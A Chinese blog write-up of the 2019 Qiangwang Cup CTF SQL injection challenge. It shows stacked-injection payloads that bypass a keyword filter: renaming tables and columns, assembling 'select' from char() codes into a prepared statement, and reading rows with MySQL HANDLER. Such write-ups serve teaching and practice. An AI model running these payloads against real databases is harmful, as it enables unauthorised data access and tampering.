[强网杯 2019]随便注

最新推荐文章于 2023-10-05 14:15:39 发布
原创 最新推荐文章于 2023-10-05 14:15:39 发布 · 279 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #WriteUp #CTF #sql注入 #web安全

文章详细介绍了在遇到SQL注入场景下,如何通过堆叠注入、SQL语句预处理以及Handler语句来绕过过滤限制,访问和操作数据库中的数据,包括改表名、改列名以及读取数据等策略。
部署运行你感兴趣的模型镜像

[强网杯 2019]随便注

在这里插入图片描述

  • 单引号闭合
  • 然后尝试联合注入1’ union select 1,databases()# 返回过滤提示。
    • return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
      在这里插入图片描述

第一种方式:堆叠注入

1';show databases#      看数据库

在这里插入图片描述

1';show tables#看表
在这里插入图片描述

1';show columns from words;# 或 1';desc words;#看表words的字段
在这里插入图片描述

1’;show columns from 1919810931114514# 或1’;desc 1919810931114514;# 看表1919810931114514的字段。

![在这里插入图片描述](https://img-blog.csdnimg.cn/5c32283098604d9ca2e7fff354ed7f6a.png)

* 到这里,就发现,没办法继续下去。
* 可以看见,表`words`有两列,列名为 “id” 和 “data” 而表`1919810931114514`只有一列 “flag” 。
* 可以发现,它是通过 “id” 来索引的,通过输入1时的回显和展示表`words`的内容可以判断。
* 没有过滤 `alter` 和 `rename`。可以修改表名和列名。

### 思路

1. 我们把表`words`改名为其它
2. 然后把表`1919810931114514`改名为`words`
3. 再在表`1919810931114514`插入一列`id`
4. 当我们再次查询时,查询的就是`flag` 所在的表,且可以被展示出来

### payload

  • 1’;rename table words to words1;rename table 1919810931114514 to words;alter table words change flag id varchar(100) character set utf8 collate utf8_general_ci not NULL;#

  • rename table words to words1; 修改表 words 改名为其它,

  • rename table 1919810931114514 to words;修改表 1919810931114514 改名为 words

  • alter table words change flag id varchar(100) character set utf8 collate utf8_general_ci not NULL;修改列 flag 改名为 id

  • 或者可以 alter table words add id int unsigned not Null auto_increment primary key;在表 1919810931114514 插入一列 id

  • 然后再 1’ or 1=1# ,展示flag


## 第二种方式:sql语句预处理
  • 在sql语句中,@ 用于定义变量。
  • concat(),函数用于字符串拼接。
  • char(),将ASCII码转换为对应的字符。
  • 定义预处理语句 PREPARE stmt_name FROM preparable_stmt;
  • 执行预处理语句 EXECUTE stmt_name [USING @var_name [, @var_name] …];
  • 删除(释放)定义 {DEALLOCATE | DROP} PREPARE stmt_name;

### payload

  • 1’;SET @sql = concat(char(115,101,108,101,99,116), " * from 1919810931114514"); PREPARE yuchuli from @sql; EXECUTE yuchuli;

    • 因为select被过滤,用char(115,101,108,101,99,116)生成select,也可以用拼接生成select。
    • 然后用concat()拼接成一句完整的sql语句。
    • 先定义了一个变量sql,然后将变量sql定义为预处理语句,然后再执行。

## 第三种方式:通过handler读取数据

### payload

1’;handler 1919810931114514 open;handler 1919810931114514 read first#


* mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
  • HANDLER tbl_name OPEN [ [AS] alias]
  • HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…)[ WHERE where_condition ] [LIMIT … ]
  • HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }[ WHERE where_condition ] [LIMIT … ]
  • HANDLER tbl_name READ { FIRST | NEXT }[ WHERE where_condition ] [LIMIT … ]
  • HANDLER tbl_name CLOSE

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

Spring系列--JdbcTemplate详解
qq_43404873的博客
11-17 3599
Spring JDBC Spring的JDBC模块负责数据库资源管理和错误处理,大大简化了开发人员对数据库的操作,使得开发人员可以从烦琐的数据库操作中解脱出来,从而将更多的精力投入编写业务逻辑中。 Spring JdbcTemplate的解析 针对数据库的操作,Spring框架提供了jdbcTemplate类,该类是Spring框架数据抽象层的基础。可以说,jdbcTemplate类是Spring JDBC的核心类。 JdbcTemplate类的继承关系十分简单。它继承自抽象类JdbcAccessor,同时
spring-jdbcTemplate实例工程
04-21
《深入解析Spring JdbcTemplateSpring JDBC Template是Spring框架中用于简化JDBC操作的一个核心组件,它是Spring对JDBC API的封装,旨在提供一个更加简洁、健壮且可测试的数据库访问层。在这个实例工程中,我们...
Spring5详细笔记3(JdbcTemplate
zhoushanmin的博客
12-11 305
1、Spring 框架概述 2、IOC 容器 3、AOP 4、JdbcTemplate   AOP(概念)   AOP(底层原理)   AOP(JDK 动态代理)   AOP(CGLIB动态代理)   AOP 的开发中的相关术语   AOP 操作(AspectJ 注解)   AOP 操作(xml 方式) 5、事务管理 6、Spring5 新特性 JdbcTemplate ...
Spring5-JdbcTemplate
weixin_44123412的博客
07-26 305
JDBCTemplate(概念和准备) 什么是jdbcTemplate (1)Spring框架对jdbc进行封装,使用jdbcTemplate方便对数据库进行操作 准备工作 引入jdbc (2)spring配置文件中配置数据库连接池 3. 配置jdbcTemplate对象,注入Datasource 4. 创建service类,创建dao类,.在dao注入jdbcTemplate 4. JdbcTemplate操作数据库 5. 编写一个bean 6. 编写service和dao (1) 在dao
SpringJdbcTemplate封装工具类
06-13
SpringJdbcTemplate封装工具包,包括规范model格式接口,封装SpringJdbcTemplate,实现分页,自适应多种数据库
Spring5JdbcTemplate
OY
07-26 282
一、JdbcTemplate(概念和准备) 1、JdbcTemplateSpring 框架对jdbc 进行封装, 使用JdbcTemPlate 方便实现对数据库操作 2、过程准备 引入相关jar包 在 spring 配置文件配置数据库连接池 <!--数据库连接池--> <bean id="dataSource" class="com.alibaba.druid.pool.DruidDataSource" destroy-method="close">
Spring5.X JdbcTemplate
lemon
02-26 442
1、JdbcTemplate类图 2、JdbcAccessor {@link org.springframework.jdbc.core.JdbcTemplate}和其他JDBC访问DAO帮助器的基类,定义了诸如DataSource和异常转换器之类的通用属性 3、JdbcOperations 指定一组基本JDBC操作的接口。 由{@link JdbcTemplate}实现。...
spring-springMvc-jdbctemplate.rar
02-22
在本项目中,"spring-springMvc-jdbctemplate.rar" 是一个包含了使用Spring框架、Spring MVC和JdbcTemplate实现的Web应用示例。这个压缩包可能包含了一系列的配置文件、源代码和数据库脚本,旨在展示如何整合这些...
Spring-With-JdbcTemplate
05-09
Spring-With-JdbcTemplate 使用JdbcTemplate完成CRUD操作的完整代码弹簧需要执行哪些操作从GitHub上导入Eclipse进行Maven安装(Git Pull)#Create DB 删除数据库manishjdbc; 创建数据库manishjdbc; 使用...
Spring--JdbcTemplate.pdf
01-02
标题中提到的"JdbcTemplate"是Spring框架中提供的一个用于简化数据库操作的JDBC抽象库。它是对Java标准数据库编程接口JDBC的一种封装,旨在简化JDBC编程,减少样板代码,使得开发者在使用Spring框架时能够更便捷地对...
Spring5——JdbcTemplate介绍
仰望与追逐的博客
08-10 586
Spring5——JdbcTemplate介绍1、JdbcTemplate(概念和准备)2、JdbcTemplate 操作数据库(添加)3、JdbcTemplate 操作数据库(修改和删除)4、JdbcTemplate 操作数据库(查询返回某个值)5JdbcTemplate 操作数据库(查询返回对象)6、JdbcTemplate 操作数据库(查询返回集合)7、JdbcTemplate 操作数据库(批量操作) 1、JdbcTemplate(概念和准备) 1、什么是 JdbcTemplate (1)Sprin
三、Spring5框架之JdbcTemplate
qq_41231318的博客
07-30 271
JdbcTemplate 1、什么是 JdbcTemplate (1)Spring 框架对 JDBC 进行封装,使用 JdbcTemplate 方便实现对数据库操作 2、准备工作 (1)引入相关 jar 包 (2)在 spring 配置文件配置数据库连接池、JdbcTemplate 对象 <!-- 组件扫描 --> <context:component-scan base-package="com.company"></context:component-scan&g
[Spring] Spring5——JdbcTemplate 简介
joyride_run的博客
10-05 507
Spring 框架对 JDBC 进行封装,形成一个 Spring 风格的模板,使用 JdbcTemplate 方便实现对数据库操作。
Spring5.0源码:jdbcTemplate
weixin_37571795的博客
09-04 872
数据库连接JDBC jdbcTemplate的初始化是从DataSource开始的。 DataSource实例通过参数注入,DataSource的创建过程是可引入第三方的连接池。 DataSource是整个数据库操作的基础,其封装了整个数据库的连接信息。 例: 配置好dataSource后 jdbcTemplate.update---->update—>execute update可...
Spring5_JdbcTemplate操作
wanananhh的博客
08-28 412
JdbcTemplate操作
Spring学习5----jdbcTemplate实现crud操作
sunaxp的博客
07-16 401
1spring框架是一站式框架针对javaee三层,每一层都有解决技术在dao层,使用jdbcTemplatejdbcTemplate对jdbc进行封装2准备工作:(1)导入jar包:除了基本的Spring jar包,还需导入spring-jdbc.RELEASE.jar,spring-tx.RELEASE.jar,        mysql-connector-jar-bin.jar(2)数据库...
jdbcTemplate()
曰业而安的博客
03-13 1496
spring jdbcTemplate 详解 jdbcTemplate类似于DBUtils,用于操作jdbc的工具类,它需要依赖于连接池DataSource(数据源)。它是spring框架提供的一个对象,是对原始jdbc api 对象的简单封装。JDBC(Java DataBase Connectivity,java 数据库连接)是一种用于执行SQL语句的java ...
Spring4-5 Spring对JDBC的支持
Java名企面试吧
03-16 1236
为使JDBC更加易于使用,Spring在JDBC API上定义了抽象层,以此建立一个JDBC存取框架。作为Spring JDBC框架的核心,JDBC模板的设计目的是为不同类型的JDBC操作提供模板方法,每个模板方法都能控制整个过程,并允许覆盖过程中的特定任务;该方式可以在尽可能保留灵活性的情况下, 将数据库存取的工作量降到最低……
Java系列技术之Spring5框架
09-21
Spring是一个开放源代码的设计层面框架,他解决的是业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用。本课讲全面的剖析Spring框架的核心技术,并带大家学会Spring在实际项目的使用方法!
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值